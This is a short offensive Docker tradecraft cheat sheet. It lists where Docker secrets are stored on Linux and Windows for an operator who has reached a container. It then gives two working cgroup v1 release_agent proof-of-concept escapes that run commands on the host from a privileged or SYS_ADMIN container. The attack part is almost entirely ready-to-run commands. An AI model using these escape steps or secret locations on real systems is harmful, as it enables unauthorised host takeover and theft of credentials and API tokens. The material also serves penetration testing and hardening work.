Docker Exploit#
Offensive Docker tradecraft, finding secrets on disk inside containers and escaping a misconfigured engine to the host.
Secret locations#
If the operator gains access to a container, check these locations for plaintext or encoded passwords and API tokens.
$ docker secret ls
Linux Docker secret locations.
/run/secrets/<secret_name>
Windows Docker secret locations.
C:\ProgramData\Docker\internal\secrets
C:\ProgramData\Docker\secrets
Container escape via cgroup v1#
Version of the PoC that launches ps on the host. Spawn a new
privileged container, then exploit.
$ docker run --rm -it --privileged ubuntu bash
d=`dirname $(ls -x /s*/fs/c*/*/r* | head -n1)`
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c > $d/release_agent
printf '#!/bin/sh\nps > '"$t/o" > /c
chmod +x /c; sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1; cat /o
Run a ps aux on the host and save output to /output in the
container.
# on the host
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# in the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"